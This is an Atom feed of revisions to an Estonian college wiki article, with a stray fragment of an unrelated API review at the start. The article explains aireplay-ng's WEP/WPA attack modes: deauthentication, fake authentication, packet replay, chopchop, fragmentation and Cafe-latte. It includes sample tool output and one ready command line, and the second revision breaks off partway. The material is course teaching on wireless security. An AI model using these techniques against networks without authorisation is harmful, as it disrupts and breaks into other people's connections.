koos teiste filmi parameetritega. Kui liiga palju meetoteid on, pole ka alati hea.&lt;br /&gt;
Aga samas, see on minu arvamus. Edu!&lt;br /&gt;
&lt;br /&gt;
Taavi Ilves D21&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Teenuseid on korralik hulk, kuid Eestikeelsed API nimed ei ole arusaadavad välismaalastele. Segadust tekitab veel &amp;quot;anna*&amp;quot; ja &amp;quot;võta*&amp;quot;, kas mina annan talle ja ta võtab, või võtab tema ja annab mulle - nimi peaks ütleme kohe mis suunas liiklus käib. Tundub et mõned päringud saaks kokku &#039;&#039;mergeda&#039;&#039;, näiteks annaFilmid ja annaFilmidNimi. Üldiselt aga on kena :)&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32533</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32533"/>
		<updated>2011-05-22T20:23:42Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30987</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30987"/>
		<updated>2011-05-10T10:52:23Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* IP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
